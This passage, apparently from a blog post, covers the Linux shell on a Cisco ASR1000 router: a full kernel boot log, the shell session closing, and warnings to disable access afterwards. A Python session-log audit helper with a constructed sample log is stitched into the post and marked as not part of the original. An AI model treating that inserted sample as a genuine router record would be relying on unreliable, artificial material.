ioremap: return fdefa000 - virt fdefa000 phys fbfe0000 size 1000 flags 829d
potar1 000a8000 ear1 00000000 bar1 000a8000 ar1 8004400b
potar2 00000000 ear2 00000000 bar2 000a8001 ar2 8008800b
start 0 end a8000000 off a8000fff ios 0 ioe fff iob a8001000
mpc85xx_setup_hose pci io_base
ioremap: return fdef9000 - virt fdef9000 phys a8001000 size 1000 flags 829d
PCI Autoconfig: Found Bus 0, Device 17, Function 0
PCI Autoconfig: BAR 0x10, I/O, size=0x100, address=0xf00
PCI Autoconfig: BAR 0x18, I/O, size=0x100, address=0xe00
mpc85xx_setup_hose -- ht tbl 29c256e5
ioremap: return fdef8000 - virt fdef8000 phys fbf0b000 size 1000 flags 829d
mpc85xx_setup_hose--pci_init_resource()tbl 29c25849 c0000000 c01fffff
ioremap: return fdef7500 - virt fdef7000 phys fbf04500 size 1000 flags 829d
ioremap: return fdef6600 - virt fdef6000 phys fbf04600 size 1000 flags 829d
On node 0 totalpages: 1031936
DMA zone: 196608 pages, LIFO batch:31
HighMem zone: 835328 pages, LIFO batch:31
Built 1 zonelists. Total pages: 1031936
Kernel command line: root=/dev/ram rw console=ttyS0,9600 SR_BOOT=tftp:base_fp_00.pkg
ioremap: return fdeb6000 - virt fdeb6000 phys fbf40000 size 40000 flags 829d
mpc85xx_ads_init_IRQ() change opic_irq 53 from 1 to 3
mpc85xx_ads_init_IRQ() change opic_irq 54 from 1 to 3
OpenPIC Version 1.2 (1 CPUs and 114 IRQ sources) at fdeb6000
PID hash table entries: 4096 (order: 12, 16384 bytes)
Dentry cache hash table entries: 131072 (order: 7, 524288 bytes)
Inode-cache hash table entries: 65536 (order: 6, 262144 bytes)
ASR1000: mem_init() highmem_mapnr 30000 max_mapnr fbf00 mem_map c366d000
ASR1000: using mcp_memrsv_fp
ASR1000: resv 80000 - 87fff rem 32768
ASR1000: resv 90000 - 90010 rem 17
ASR1000: resv a8000 - a87ff rem 2048
ASR1000: resv a8800 - a8fff rem 2048
ASR1000: resv fbf00 - fc000
Memory: 3894564k available (2500k kernel code, 928k data, 132k init, 3193788k highmem)
Calibrating delay loop... 1196.03 BogoMIPS (lpj=598016)
Mount-cache hash table entries: 512
checking if image is initramfs... it is
ASR1000: NOT Freeing initrd memory: start c0981000 end c0fb8336 vtop c3680020 for 6364k freed
NET: Registered protocol family 16
PCI: Probing PCI hardware
PCI: scan skipped for hose c0381100
mpc85xx_pcibios_fixup() entered for MCP/RP
Registering openpic with sysfs...
ASR1000: htm init
MCP: reserved 01000000 from c6000000 or c6000000 virt 06000000 06000000 for htm. rsvpag 1000 start c372d000 end c374cfe0
MCP: lkern init
ASR1000: reserved 01000000 from 07000000 virt c7000000 lkern. rsvpag 1000 start c374d000 end c376cfe0
ASR1000: reserved 01000000 from 08000000 virt c8000000 lkern. rsvpag 1000 start c376d000 end c378cfe0
ASR1000: mcp_lkern_init() initrd_start c0981000 initrd_end c0fb8336 copy 7b8336 bytes from c0800000 to c7800000
ASR1000: lkern init. no free required.
ASR1000: lkern size for vcp is 007b8336
ASR1000: WARNING. Small vcp. Kernel core may not work.
HPAGE_SHIFT = 24
Generic PHY: Registered new driver
SCSI subsystem initialized
usbcore: registered new driver usbfs
usbcore: registered new driver hub
NET: Registered protocol family 2
IP route cache hash table entries: 32768 (order: 5, 131072 bytes)
TCP established hash table entries: 131072 (order: 7, 524288 bytes)
TCP bind hash table entries: 65536 (order: 6, 262144 bytes)
TCP: Hash tables configured (established 131072 bind 65536)
TCP reno registered
highmem bounce pool size: 64 pages
Total HugeTLB memory allocated, 0
JFFS2 version 2.2. (NAND) (C) 2001-2006 Red Hat, Inc.
io scheduler noop registered
io scheduler anticipatory registered (default)
io scheduler deadline registered
io scheduler cfq registered
PowerPC Book-E Watchdog Timer Loaded
Serial: 8250/16550 driver $Revision: 1.90 $ 2 ports, IRQ sharing disabled
serial8250.0: ttyS0 at MMIO 0xfbf04500 (irq = 26) is a 16550A
serial8250 baud from options 9600 setting uart to 9600 baud
serial8250.0: ttyS1 at MMIO 0xfbf04600 (irq = 26) is a 16550A
RAMDISK driver initialized: 16 RAM disks of 65536K size 1024 blocksize
loop: loaded (max 8 devices)
ioremap: return f105c520 - virt f105c000 phys fbf24520 size 1000 flags 829d
Gianfar MII Bus: probed
MCP: gfar_mdio_probe() dev c02d7360 new_bus c5800260, registered as MDIO bus
ioremap: return f105e000 - virt f105e000 phys fbf24000 size 1000 flags 829d
eth0: Gianfar Ethernet Controller Version 1.2, 00:00:02:00:00:00
eth0: Running with NAPI enabled
eth0: 256/256 RX/TX BD ring size
ioremap: return f1060000 - virt f1060000 phys fbf25000 size 1000 flags 829d
eth1: Gianfar Ethernet Controller Version 1.2, 00:00:02:00:00:01
eth1: Running with NAPI enabled
eth1: 256/256 RX/TX BD ring size
ioremap: return f1062000 - virt f1062000 phys fbf26000 size 1000 flags 829d
eth2: Gianfar Ethernet Controller Version 1.2, 00:00:00:00:00:00
eth2: Running with NAPI enabled
eth2: 256/256 RX/TX BD ring size
MCP: phy 1 feat 000002ff supported 000002f0 advert 000002f0
MCP: phy 2 feat 000002ff supported 000002f0 advert 000002f0
Marvell 88E1101: Registered new driver
Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2
ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx
physmap platform flash device: 01000000 at ff000000
ioremap: return f1080000 - virt f1080000 phys ff000000 size 1000000 flags 829d
physmap-flash.0: Found 1 x16 devices at 0x0 in 16-bit bank
Intel/Sharp Extended Query Table at 0x0031
cfi_cmdset_0001: Suspend erase on write disabled.
cfi_cmdset_0001: write suspend disabled
Using buffer write method
Extended Query version 1.1
Feature/Command Support: 00CA
- Chip Erase: unsupported
- Suspend Erase: supported
- Suspend Program: unsupported
- Legacy Lock/Unlock: supported
- Queued Erase: unsupported
- Instant block lock: unsupported
- Protection Bits: supported
- Page-mode read: supported
- Synchronous read: unsupported
- Simultaneous operations: unsupported
- Extended Flash Array: unsupported
Supported functions after Suspend: 00
- Program after Erase Suspend: unsupported
Block Status Register Mask: 0001
- Lock Bit Active: yes
- Lock-Down Bit Active: no
- EFA Lock Bit: no
- EFA Lock-Down Bit: no
Vcc Logic Supply Optimum Program/Erase Voltage: 3.3 V
erase region 0: offset=0x0,size=0x20000,blocks=128
cmdlinepart partition parsing not available
RedBoot partition parsing not available
Using physmap partition information
Creating 6 MTD partitions on "physmap-flash.0":
0x00000000-0x00a00000 : "Crashdump"
0x00a00000-0x00c00000 : "OBFL Data"
0x00c00000-0x00c20000 : "NVRAM Backup"
0x00c20000-0x00e00000 : "Upgrade Boot Rom"
0x00e00000-0x00e20000 : "NVRAM"
0x00e20000-0x01000000 : "Running Boot Rom"
ohci_hcd: 2005 April 22 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI)
USB Universal Host Controller Interface driver v3.0
Initializing USB Mass Storage driver...
usbcore: registered new driver usb-storage
USB Mass Storage support registered.
i2c /dev entries driver
ioremap: return f1064000 - virt f1064000 phys fbf03000 size 1000 flags 829d
ioremap: return f1066100 - virt f1066000 phys fbf03100 size 1000 flags 829d
oprofile: using ppc/e500 performance monitoring.
TCP bic registered
NET: Registered protocol family 1
NET: Registered protocol family 17
/auto/mcpbuilds2/release/02.04.02/BLD-02.04.02/os/linux/drivers/rtc/hctosys.c: unable to open rtc device (rtc0)
Freeing unused kernel memory: 132k init
ioremap: return f2180000 - virt f2180000 phys 80000000 size 80000 flags 829d
rmonbifo_mod: module license 'Proprietary' taints kernel.
rmonbifo.ko loaded. 0.0.3 Date Nov 4 2009 21:29:47
Copyright (c) 2005-2009 by Cisco Systems, Inc.
piso.o loaded. 0.0.2 Date Nov 4 2009 21:29:47
Copyright (c) 2006-2007 by cisco Systems, Inc.
ASR1000: NOT Freeing initrd memory: start c0fb9000 end c366d000 vtop c368c720 for 39632k freed
ISO 9660 Extensions: RRIP_1991A
PowerPC Book-E Watchdog timer device opened at syspage time 14080
PowerPC Book-E Watchdog timer device opened at timebase time 704013154
PowerPC Watchdog starting at syspage time: 14256 with time base bit set to 33
PowerPC Watchdog starting at timebase time: 712849849 with time base bit set to 33
PowerPC Watchdog driver wrote 0xec0e0000 to SPRN_TCR register to set watchdog period of 33
PowerPC Book-E Watchdog Timer Enabled (wdt_period=33)
ISO 9660 Extensions: RRIP_1991A
htc.o loaded. 0.0.8 Date Nov 4 2009 21:29:02
Copyright (c) 2006-2007 by Cisco Systems, Inc. All rights reserved
htc: htc_setup_hose() ht_type = 2 pci_type = 0
htc: hose_ht from kernel: c0381100
mcpt.o loaded. 0.0.6 Date Nov 4 2009 21:28:49
Copyright (c) 2006-2009 by cisco Systems, Inc. All rights reserved
mcpt: mcp-fp sets mcpt_type to Scooby. Temporary.
ioremap: return f106a000 - virt f106a000 phys fbf20000 size 1000 flags 829d
ioremap: return f2160000 - virt f2160000 phys 90000000 size 10000 flags 829d
ioremap: return f106c000 - virt f106c000 phys fbf20000 size 1000 flags 829d
mcpt_mod.ko: mapped mstp_htp f106c000
ioremap: return f1068000 - virt f1068000 phys fbf02000 size 1000 flags 829d
ddr iomem = f1068000
ddr module loaded
PowerPC Book-E Watchdog timer device opened at syspage time 20254
PowerPC Book-E Watchdog timer device opened at timebase time 1012726660
lkrd.o loaded. 0.0.1 Date Nov 4 2009 21:29:18
Copyright (c) 2007 by cisco Systems, Inc.
ioremap: return f2600000 - virt f2600000 phys 80800000 size 130000 flags 829d
/auto/mcpbuilds2/release/02.04.02/BLD-02.04.02/os/linux/drivers/binos/i2c/cy2213/cy2213_main.c:cy2213_detect (line 327): resource is busyioremap: return f2780000 - virt f2780000 phys 81000000 size 100000 flags 829d
cpp_ecsr_base_p = f2780000
cpp_mod.o loaded. 2.0.1 Date Nov 4 2009 21:28:58
ioremap: return f106e000 - virt f106e000 phys 131fff000 size 1000 flags 829d
cpp_ppe_iic_reg_addr = f106e000
cpp_intr_mod.o loaded. 1.0.1 Date Nov 4 2009 21:29:00
cpp_spi_mod.o loaded. 1.0.1 Date Nov 4 2009 21:29:00
cpp_il_mod.o loaded. 1.0.1 Date Nov 4 2009 21:28:58
cpp_htdp_intr_mod.o loaded. 0.0.1 Date Nov 4 2009 21:28:58
ioremap: return f2210000 - virt f2210000 phys 80100000 size 8000 flags 829d
Scansta primary init with board type = 0x20
Regbase addr: 0xf2210000, Reg map size:0x00008000
mmem.o loaded. 0.0.3 Date Nov 4 2009 21:29:20
Copyright (c) 2006-2008 by cisco Systems, Inc. All rights reserved
PowerPC Book-E Watchdog timer device opened at syspage time 23757
PowerPC Book-E Watchdog timer device opened at timebase time 1187863346
PowerPC Book-E Watchdog timer device opened at syspage time 24472
PowerPC Book-E Watchdog timer device opened at timebase time 1223614176
scooby: udog: FD open
scooby: init_flags: 0x2
PCI: Enabling device 0000:00:11.0 (0000 -> 0001)
MCP N2 driver init with 18 cores, mask: 3ffff
/auto/mcpbuilds2/release/02.04.02/BLD-02.04.02/os/linux/drivers/binos/i2c/cy2213/cy2213_main.c:cy2213_ioctl (line 283): CY2213_IOCS_CONFIG: sent 00:00:03:41
CPP power up successful
CPP power up successful
htc: debug changed 400a0000
htc: htc_setup_hose() ht_type = 2 pci_type = 0
htc: hose_ht from kernel: c0381100
ioremap: return f220c000 - virt f220c000 phys fbf0b000 size 1000 flags 829d
ioremap: return f220e000 - virt f220e000 phys fbf00000 size 1000 flags 829d
htc: mcp-fp modified lawbar3 00100000:8020001f lawar4 8000000c
mpc85xx_setup_ht_gda() complete
PowerPC Book-E Watchdog timer device opened at syspage time 36275
PowerPC Book-E Watchdog timer device opened at timebase time 1813791509
PowerPC Book-E Watchdog time base bit set to 33 at syspage time 36276
PowerPC Book-E Watchdog time base bit set to 33 at timebase time 1813817323
cpp_htdp_mmap: remap_pfn_range range 0x46194000 - 0x46195000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x46195000 - 0x46196000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x46196000 - 0x4619F000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x4619F000 - 0x461A8000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x461A8000 - 0x461A9000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x461A9000 - 0x461B2000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x461B2000 - 0x461B3000 pgoff 0x00000000 prot 0x00000297
cpp_spi_get_mode: RX=eSPI TX=eSPI
cpp_spi_mod[CPP_SPI_STATE]: state changed to ONLINE
cpp_spi_rx_phy_reset: SPI0
cpp_spi_enable: enable SPI0
cpp_spi_intrpt_enable: enable SPI0


Exit...


[ASR1k_ESP_0:/]$ exit
[ASR1k_RP_0:/]$ exit
Session log harddisk:tracelogs/system_shell_R0.log.20100201101531 closed.

ASR1k#


Everything you do while in the shell gets recorded in the above system_shell_x.log file, so you can refer to it at a later time.
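A small audit helper for that session log, added here as an example and not part of the original post: it pulls the commands typed at each `[module:dir]$` prompt out of a saved copy of the log and flags anything outside a reviewer-chosen allowlist. The sample log is constructed, and it is assumed that the log mirrors the terminal transcript, that the text after the colon in the prompt is the working directory, and that the hypothetical `ALLOWED` set suits your review.

```python
import re

# Prompt format as seen in the session on this page, e.g. "[ASR1k_ESP_0:/]$ exit".
PROMPT = re.compile(r"^\[(?P<host>[^:\]]+):(?P<cwd>[^\]]*)\]\$ ?(?P<cmd>.*)$")
CLOSED = re.compile(r"^Session log (?P<path>\S+) closed\.$")

# Hypothetical allowlist: commands a reviewer expects in a supervised session.
ALLOWED = {"exit", "dmesg", "cd", "ls", "cat"}

# Constructed excerpt; only the prompts and the closing line follow the page.
SAMPLE_LOG = """\
[ASR1k_ESP_0:/]$ dmesg
CPP power up successful
[ASR1k_ESP_0:/]$ cd /tmp
[ASR1k_ESP_0:/tmp]$
[ASR1k_ESP_0:/tmp]$ rm -f old.log
[ASR1k_ESP_0:/tmp]$ exit
[ASR1k_RP_0:/]$ exit
Session log harddisk:tracelogs/system_shell_R0.log.20100201101531 closed.
"""

def parse_session(text):
    """Return (commands, log_path) extracted from a shell session log."""
    commands, log_path = [], None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.rstrip("\r")
        m = PROMPT.match(line)
        if m:
            cmd = m.group("cmd").strip()
            if cmd:  # a bare prompt means the user only pressed Enter
                commands.append({"line": lineno, "host": m.group("host"),
                                 "cwd": m.group("cwd"), "cmd": cmd})
            continue
        closed = CLOSED.match(line.strip())
        if closed:
            log_path = closed.group("path")
    return commands, log_path

def unexpected(commands, allowed=ALLOWED):
    """Return the commands whose first word is not in the allowlist."""
    return [c for c in commands if c["cmd"].split()[0] not in allowed]

if __name__ == "__main__":
    cmds, path = parse_session(SAMPLE_LOG)
    print(f"{len(cmds)} commands recorded in {path}")
    for c in unexpected(cmds):
        print(f"review: line {c['line']} on {c['host']} in {c['cwd']}: {c['cmd']}")
```
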

Note: It's strongly recommended to disable shell access after you finish playing with it, unless you know what you're doing. You don't want to end up with someone messing with your router.

WARNING: Everything above this line is done at your own risk. You probably don't want to experiment on a production network, and you'd better use this functionality only under the supervision of Cisco Support.

I tried all kinds of text editing/parsing and everything worked fine. This seems like a nice way to decrease the time for the whole script edit/save/upload/test procedure. You just edit it online!

I still haven't tried installing any new tools, but I don't think there will be any major issues (at least for the basic ones). After all, it's still a Linux box. Your imagination is the only limit...

 
Creative Commons License
This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.
This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 Greece License.